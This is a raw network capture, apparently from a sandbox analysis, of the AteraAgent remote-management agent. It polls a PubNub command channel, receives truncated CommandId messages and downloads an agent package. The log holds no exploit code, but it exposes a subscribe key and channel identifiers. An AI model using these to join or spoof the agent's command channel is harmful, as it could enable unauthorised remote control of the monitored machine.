2024-11-24 10:15:43 UTC | 364 | OUT | GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=b225017a-a518-407e-ba60-89916d0db242&tt=0&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json
Host: ps.pndsn.com
Connection: Keep-Alive
2024-11-24 10:15:44 UTC | 277 | IN | HTTP/1.1 200 OK
Date: Sun, 24 Nov 2024 10:15:44 GMT
Content-Type: text/javascript; charset="UTF-8"
Content-Length: 45
Connection: close
Cache-Control: no-cache
Access-Control-Allow-Methods: GET
Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                          2024-11-24 10:15:44 UTC45INData Raw: 7b 22 74 22 3a 7b 22 74 22 3a 22 31 37 33 32 34 34 33 33 34 34 30 39 34 32 34 31 38 22 2c 22 72 22 3a 33 31 7d 2c 22 6d 22 3a 5b 5d 7d
                                                                                                                                                                                                                                                                          Data Ascii: {"t":{"t":"17324433440942418","r":31},"m":[]}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49779 | 13.232.67.198 | 443 | 6216 | C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-24 10:15:46 UTC | 159 | OUT | GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=bf4acf61-3ccb-481c-8428-f2b8078e60c9&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
Host: ps.pndsn.com
2024-11-24 10:15:47 UTC | 242 | IN | HTTP/1.1 200 OK
Date: Sun, 24 Nov 2024 10:15:47 GMT
Content-Type: text/javascript; charset="UTF-8"
Connection: close
Content-Length: 19
Cache-Control: no-cache
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
2024-11-24 10:15:47 UTC | 19 | IN | Data Raw: 5b 31 37 33 32 34 34 33 33 34 37 32 33 36 33 35 39 38 5d
Data Ascii: [17324433472363598]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49780 | 13.232.67.198 | 443 | 6216 | C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-24 10:15:46 UTC | 362 | OUT | GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=ec94d306-e989-460d-a2a2-e676241f4153&tr=31&tt=17324433440942418&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json
Host: ps.pndsn.com
2024-11-24 10:15:47 UTC | 279 | IN | HTTP/1.1 200 OK
Date: Sun, 24 Nov 2024 10:15:47 GMT
Content-Type: text/javascript; charset="UTF-8"
Content-Length: 1854
Connection: close
Cache-Control: no-cache
Access-Control-Allow-Methods: GET
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
2024-11-24 10:15:47 UTC | 1854 | IN | Data Ascii: {"t":{"t":"17324433474018542","r":31},"m":[{"a":"2","f":0,"i":"f1c7b405-cda8-4d87-a0fb-98baca7fce4d","p":{"t":"17324433474018542","r":42},"k":"sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f","c":"2094f497-2e94-42f0-b27c-add7e377a9d2","d":{"CommandId":"6be7450


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49794 | 13.232.67.198 | 443 | 6216 | C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-24 10:15:50 UTC | 362 | OUT | GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=97a3c5c1-3b53-4697-9042-014f3710a368&tr=31&tt=17324433474018542&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json
Host: ps.pndsn.com
2024-11-24 10:16:43 UTC | 279 | IN | HTTP/1.1 200 OK
Date: Sun, 24 Nov 2024 10:16:43 GMT
Content-Type: text/javascript; charset="UTF-8"
Content-Length: 1854
Connection: close
Cache-Control: no-cache
Access-Control-Allow-Methods: GET
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
2024-11-24 10:16:43 UTC | 1854 | IN | Data Ascii: {"t":{"t":"17324434035400814","r":31},"m":[{"a":"2","f":0,"i":"b3b73710-889c-4467-b264-7a1d0fef8f72","p":{"t":"17324434035400814","r":43},"k":"sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f","c":"2094f497-2e94-42f0-b27c-add7e377a9d2","d":{"CommandId":"76e2085


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 49793 | 13.232.67.198 | 443 | 6216 | C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-24 10:15:50 UTC | 159 | OUT | GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=ad2d8efb-91cb-408c-a084-3f507796640e&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
Host: ps.pndsn.com
2024-11-24 10:15:50 UTC | 242 | IN | HTTP/1.1 200 OK
Date: Sun, 24 Nov 2024 10:15:50 GMT
Content-Type: text/javascript; charset="UTF-8"
Connection: close
Content-Length: 19
Cache-Control: no-cache
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
2024-11-24 10:15:50 UTC | 19 | IN | Data Raw: 5b 31 37 33 32 34 34 33 33 35 30 36 32 38 35 39 31 39 5d
Data Ascii: [17324433506285919]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 49796 | 108.158.75.93 | 443 | 6216 | C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-24 10:15:50 UTC | 212 | OUT | GET /agentpackagesnet45/AgentPackageAgentInformation/38.0/AgentPackageAgentInformation.zip?7eC/6UeVMT2yOja7rugNNkxRTCpJ1tREDX7f6JkZ3OlpG2NJMgnOjIB/dqEJPBcv HTTP/1.1
Host: ps.atera.com
Connection: Keep-Alive
2024-11-24 10:15:51 UTC | 671 | IN | HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 384542
Connection: close
Content-MD5: SgmofSAE2sSwBofpyfFQNg==
Last-Modified: Tue, 12 Nov 2024 07:13:54 GMT
ETag: 0x8DD02E9910FA268
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 4f2b2192-601e-007b-57cf-3c3f56000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 23 Nov 2024 11:11:18 GMT
Vary: Accept-Encoding
X-Cache: Hit from cloudfront
Via: 1.1 d13599e93e28769e714d7ed56fe9074a.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: BAH53-P2
X-Amz-Cf-Id: E-LmB9aEb8N0HsFp5Sm718YgIPnWRIonEKVRrtS15JPQbIXTMEsqAg==
                                                                                                                                                                                                                                                                          Age: 83071


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.7 | 49900 | 13.232.67.198 | 443 | 6216 | C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-24 10:16:35 UTC | 159 | OUT | GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=19414362-703b-464a-b6c7-07f45d92c533&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
Host: ps.pndsn.com
2024-11-24 10:16:35 UTC | 242 | IN | HTTP/1.1 200 OK
Date: Sun, 24 Nov 2024 10:16:35 GMT
Content-Type: text/javascript; charset="UTF-8"
Connection: close
Content-Length: 19
Cache-Control: no-cache
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
2024-11-24 10:16:35 UTC | 19 | IN | Data Raw: 5b 31 37 33 32 34 34 33 33 39 35 37 32 34 32 37 37 31 5d
Data Ascii: [17324433957242771]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.7 | 49910 | 13.232.67.198 | 443 | 6216 | C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-24 10:16:38 UTC | 358 | OUT | GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/heartbeat?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=c6f3c309-b378-4eb6-be20-6f03325c221f&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json
Host: ps.pndsn.com
2024-11-24 10:16:38 UTC | 322 | IN | HTTP/1.1 200 OK
Date: Sun, 24 Nov 2024 10:16:38 GMT
Content-Type: text/javascript; charset="UTF-8"
Content-Length: 55
Connection: close
Access-Control-Allow-Methods: OPTIONS, GET, POST
Age: 0
Cache-Control: no-cache
Accept-Ranges: bytes
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
2024-11-24 10:16:38 UTC | 55 | IN | Data Raw: 7b 22 73 74 61 74 75 73 22 3a 20 32 30 30 2c 20 22 6d 65 73 73 61 67 65 22 3a 20 22 4f 4b 22 2c 20 22 73 65 72 76 69 63 65 22 3a 20 22 50 72 65 73 65 6e 63 65 22 7d
Data Ascii: {"status": 200, "message": "OK", "service": "Presence"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.7 | 49932 | 13.232.67.198 | 443 | 6216 | C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-24 10:16:46 UTC | 362 | OUT | GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=b22252c6-c37c-49ec-8023-03bf78fe353a&tr=31&tt=17324434035400814&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json
Host: ps.pndsn.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.7 | 49931 | 13.232.67.198 | 443 | 6216 | C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-24 10:16:46 UTC | 159 | OUT | GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=b3f74bb1-6c6f-4d46-bcd1-dababeae95b1&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
Host: ps.pndsn.com
2024-11-24 10:16:46 UTC | 242 | IN | HTTP/1.1 200 OK
Date: Sun, 24 Nov 2024 10:16:46 GMT
Content-Type: text/javascript; charset="UTF-8"
Connection: close
Content-Length: 19
Cache-Control: no-cache
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
2024-11-24 10:16:46 UTC | 19 | IN | Data Raw: 5b 31 37 33 32 34 34 33 34 30 36 36 30 34 30 39 38 32 5d
Data Ascii: [17324434066040982]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.7 | 49952 | 13.232.67.198 | 443 | 6216 | C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-24 10:16:53 UTC | 159 | OUT | GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=9d2bb483-a1d5-41c5-b567-c3f48ab6ed2c&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
Host: ps.pndsn.com
2024-11-24 10:16:53 UTC | 242 | IN | HTTP/1.1 200 OK
Date: Sun, 24 Nov 2024 10:16:53 GMT
Content-Type: text/javascript; charset="UTF-8"
Connection: close
Content-Length: 19
Cache-Control: no-cache
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
2024-11-24 10:16:53 UTC | 19 | IN | Data Raw: 5b 31 37 33 32 34 34 33 34 31 33 34 37 39 38 31 34 31 5d
Data Ascii: [17324434134798141]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.7 | 49950 | 13.232.67.198 | 443 | 6216 | C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-24 10:16:53 UTC | 354 | OUT | GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/leave?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=618f72e2-0dcf-4d40-b59c-d773fc1ae2ba&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json
Host: ps.pndsn.com
2024-11-24 10:16:53 UTC | 322 | IN | HTTP/1.1 200 OK
Date: Sun, 24 Nov 2024 10:16:53 GMT
Content-Type: text/javascript; charset="UTF-8"
Content-Length: 74
Connection: close
Access-Control-Allow-Methods: OPTIONS, GET, POST
Age: 0
Cache-Control: no-cache
Accept-Ranges: bytes
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
2024-11-24 10:16:53 UTC | 74 | IN | Data Raw: 7b 22 73 74 61 74 75 73 22 3a 20 32 30 30 2c 20 22 6d 65 73 73 61 67 65 22 3a 20 22 4f 4b 22 2c 20 22 61 63 74 69 6f 6e 22 3a 20 22 6c 65 61 76 65 22 2c 20 22 73 65 72 76 69 63 65 22 3a 20 22 50 72 65 73 65 6e 63 65 22 7d
Data Ascii: {"status": 200, "message": "OK", "action": "leave", "service": "Presence"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.7 | 49963 | 13.232.67.198 | 443 | 6216 | C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-24 10:16:56 UTC | 340 | OUT | GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=9cb19796-6c2e-41ce-9126-598ecc9d33d5&tt=0&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json
Host: ps.pndsn.com
2024-11-24 10:16:56 UTC | 277 | IN | HTTP/1.1 200 OK
Date: Sun, 24 Nov 2024 10:16:56 GMT
Content-Type: text/javascript; charset="UTF-8"
Content-Length: 45
Connection: close
Cache-Control: no-cache
Access-Control-Allow-Methods: GET
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
2024-11-24 10:16:56 UTC | 45 | IN | Data Raw: 7b 22 74 22 3a 7b 22 74 22 3a 22 31 37 33 32 34 34 33 34 30 33 35 34 30 30 38 31 34 22 2c 22 72 22 3a 33 31 7d 2c 22 6d 22 3a 5b 5d 7d
Data Ascii: {"t":{"t":"17324434035400814","r":31},"m":[]}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.7 | 49971 | 13.232.67.198 | 443 | 6216 | C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-24 10:16:59 UTC | 159 | OUT | GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=2bb33ca5-3446-47a7-8747-dbbe274b3fa8&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
Host: ps.pndsn.com
2024-11-24 10:16:59 UTC | 242 | IN | HTTP/1.1 200 OK
Date: Sun, 24 Nov 2024 10:16:59 GMT
Content-Type: text/javascript; charset="UTF-8"
Connection: close
Content-Length: 19
Cache-Control: no-cache
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
2024-11-24 10:16:59 UTC | 19 | IN | Data Raw: 5b 31 37 33 32 34 34 33 34 31 39 34 35 34 38 38 35 34 5d
Data Ascii: [17324434194548854]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.7 | 49972 | 13.232.67.198 | 443 | 6216 | C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-24 10:16:59 UTC | 362 | OUT | GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=fe727902-1ef3-4552-afad-6178afa6c12c&tr=31&tt=17324434035400814&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json
Host: ps.pndsn.com
2024-11-24 10:16:59 UTC | 279 | IN | HTTP/1.1 200 OK
Date: Sun, 24 Nov 2024 10:16:59 GMT
Content-Type: text/javascript; charset="UTF-8"
Content-Length: 1869
Connection: close
Cache-Control: no-cache
Access-Control-Allow-Methods: GET
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
2024-11-24 10:16:59 UTC | 1869 | IN | Data Raw: 7b 22 74 22 3a 7b 22 74 22 3a 22 31 37 33 32 34 34 33 34 31 38 32 32 33 34 33 30 31 22 2c 22 72 22 3a 33 31 7d 2c 22 6d 22 3a 5b 7b 22 61 22 3a 22 32 22 2c 22 66 22 3a 30 2c 22 69 22 3a 22 34 34 39 39 61 66 64 34 2d 32 63 37 63 2d 34 37 61 61 2d 39 32 63 37 2d 61 38 37 62 37 39 65 66 38 65 36 34 22 2c 22 70 22 3a 7b 22 74 22 3a 22 31 37 33 32 34 34 33 34 31 38 32 32 33 34 33 30 31 22 2c 22 72 22 3a 32 35 7d 2c 22 6b 22 3a 22 73 75 62 2d 63 2d 61 30 32 63 65 63 61 38 2d 61 39 35 38 2d 31 31 65 35 2d 62 64 38 63 2d 30 36 31 39 66 38 39 34 35 61 34 66 22 2c 22 63 22 3a 22 32 30 39 34 66 34 39 37 2d 32 65 39 34 2d 34 32 66 30 2d 62 32 37 63 2d 61 64 64 37 65 33 37 37 61 39 64 32 22 2c 22 64 22 3a 7b 22 43 6f 6d 6d 61 6e 64 49 64 22 3a 22 32 30 39 66 37 62 65
Data Ascii: {"t":{"t":"17324434182234301","r":31},"m":[{"a":"2","f":0,"i":"4499afd4-2c7c-47aa-92c7-a87b79ef8e64","p":{"t":"17324434182234301","r":25},"k":"sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f","c":"2094f497-2e94-42f0-b27c-add7e377a9d2","d":{"CommandId":"209f7be


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.7 | 49980 | 13.232.67.198 | 443 | 6216 | C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-24 10:17:02 UTC | 159 | OUT | GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=2a252f8a-196a-412e-bfc9-292322230586&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
Host: ps.pndsn.com
2024-11-24 10:17:02 UTC | 242 | IN | HTTP/1.1 200 OK
Date: Sun, 24 Nov 2024 10:17:02 GMT
Content-Type: text/javascript; charset="UTF-8"
Connection: close
Content-Length: 19
Cache-Control: no-cache
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
2024-11-24 10:17:02 UTC | 19 | IN | Data Raw: 5b 31 37 33 32 34 34 33 34 32 32 36 36 32 32 30 33 30 5d
Data Ascii: [17324434226622030]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.7 | 49988 | 13.232.67.198 | 443 | 6216 | C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-24 10:17:03 UTC | 354 | OUT | GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/leave?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=4097a231-6804-42b7-a1c1-b63735fd2c43&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json
Host: ps.pndsn.com
2024-11-24 10:17:04 UTC | 322 | IN | HTTP/1.1 200 OK
Date: Sun, 24 Nov 2024 10:17:04 GMT
Content-Type: text/javascript; charset="UTF-8"
Content-Length: 74
Connection: close
Access-Control-Allow-Methods: OPTIONS, GET, POST
Age: 0
Cache-Control: no-cache
Accept-Ranges: bytes
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
2024-11-24 10:17:04 UTC | 74 | IN | Data Raw: 7b 22 73 74 61 74 75 73 22 3a 20 32 30 30 2c 20 22 6d 65 73 73 61 67 65 22 3a 20 22 4f 4b 22 2c 20 22 61 63 74 69 6f 6e 22 3a 20 22 6c 65 61 76 65 22 2c 20 22 73 65 72 76 69 63 65 22 3a 20 22 50 72 65 73 65 6e 63 65 22 7d
Data Ascii: {"status": 200, "message": "OK", "action": "leave", "service": "Presence"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.7 | 49994 | 13.232.67.198 | 443 | 6216 | C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-24 10:17:05 UTC | 340 | OUT | GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=f5557641-16d5-42d0-befc-2c3fa49ec144&tt=0&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json
Host: ps.pndsn.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.7 | 49996 | 13.232.67.198 | 443 | 6216 | C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-24 10:17:07 UTC | 354 | OUT | GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/leave?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=28392dc4-8934-4e46-983c-9a044d541e87&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json
Host: ps.pndsn.com
2024-11-24 10:17:07 UTC | 322 | IN | HTTP/1.1 200 OK
Date: Sun, 24 Nov 2024 10:17:07 GMT
Content-Type: text/javascript; charset="UTF-8"
Content-Length: 74
Connection: close
Access-Control-Allow-Methods: OPTIONS, GET, POST
Age: 0
Cache-Control: no-cache
Accept-Ranges: bytes
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
2024-11-24 10:17:07 UTC | 74 | IN | Data Raw: 7b 22 73 74 61 74 75 73 22 3a 20 32 30 30 2c 20 22 6d 65 73 73 61 67 65 22 3a 20 22 4f 4b 22 2c 20 22 61 63 74 69 6f 6e 22 3a 20 22 6c 65 61 76 65 22 2c 20 22 73 65 72 76 69 63 65 22 3a 20 22 50 72 65 73 65 6e 63 65 22 7d
Data Ascii: {"status": 200, "message": "OK", "action": "leave", "service": "Presence"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.7 | 50000 | 13.232.67.198 | 443 | 6216 | C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-24 10:17:07 UTC | 354 | OUT | GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/leave?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=5b5ff814-67d7-4f31-988a-3021f6dcca17&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json
Host: ps.pndsn.com
2024-11-24 10:17:08 UTC | 322 | IN | HTTP/1.1 200 OK
Date: Sun, 24 Nov 2024 10:17:07 GMT
Content-Type: text/javascript; charset="UTF-8"
Content-Length: 74
Connection: close
Access-Control-Allow-Methods: OPTIONS, GET, POST
Age: 0
Cache-Control: no-cache
Accept-Ranges: bytes
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
2024-11-24 10:17:08 UTC | 74 | IN | Data Raw: 7b 22 73 74 61 74 75 73 22 3a 20 32 30 30 2c 20 22 6d 65 73 73 61 67 65 22 3a 20 22 4f 4b 22 2c 20 22 61 63 74 69 6f 6e 22 3a 20 22 6c 65 61 76 65 22 2c 20 22 73 65 72 76 69 63 65 22 3a 20 22 50 72 65 73 65 6e 63 65 22 7d
Data Ascii: {"status": 200, "message": "OK", "action": "leave", "service": "Presence"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.7 | 50009 | 13.232.67.198 | 443 | 6216 | C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-24 10:17:10 UTC | 159 | OUT | GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=bdd8f068-e461-49d2-bf76-5496f217f86a&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
Host: ps.pndsn.com
2024-11-24 10:17:10 UTC | 242 | IN | HTTP/1.1 200 OK
Date: Sun, 24 Nov 2024 10:17:10 GMT
Content-Type: text/javascript; charset="UTF-8"
Connection: close
Content-Length: 19
Cache-Control: no-cache
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
2024-11-24 10:17:10 UTC | 19 | IN | Data Raw: 5b 31 37 33 32 34 34 33 34 33 30 35 30 30 35 38 36 33 5d
Data Ascii: [17324434305005863]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.7 | 50022 | 13.232.67.198 | 443 | 6216 | C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-24 10:17:12 UTC | 340 | OUT | GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=101aac48-536c-4c37-8daf-2942910eb004&tt=0&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json
Host: ps.pndsn.com
2024-11-24 10:17:13 UTC | 277 | IN | HTTP/1.1 200 OK
Date: Sun, 24 Nov 2024 10:17:12 GMT
Content-Type: text/javascript; charset="UTF-8"
Content-Length: 45
Connection: close
Cache-Control: no-cache
Access-Control-Allow-Methods: GET
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
2024-11-24 10:17:13 UTC | 45 | IN | Data Ascii: {"t":{"t":"17324434182234301","r":31},"m":[]}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.7 | 50023 | 13.232.67.198 | 443 | 6216 | C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-24 10:17:13 UTC | 358 | OUT | GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/heartbeat?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=78d657fe-250a-4458-990e-8db1804a62a6&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json
Host: ps.pndsn.com
2024-11-24 10:17:14 UTC | 322 | IN | HTTP/1.1 200 OK
Date: Sun, 24 Nov 2024 10:17:13 GMT
Content-Type: text/javascript; charset="UTF-8"
Content-Length: 55
Connection: close
Access-Control-Allow-Methods: OPTIONS, GET, POST
Age: 0
Cache-Control: no-cache
Accept-Ranges: bytes
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
2024-11-24 10:17:14 UTC | 55 | IN | Data Ascii: {"status": 200, "message": "OK", "service": "Presence"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.7 | 50031 | 13.232.67.198 | 443 | 6216 | C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
Timestamp | Bytes transferred | Direction | Data
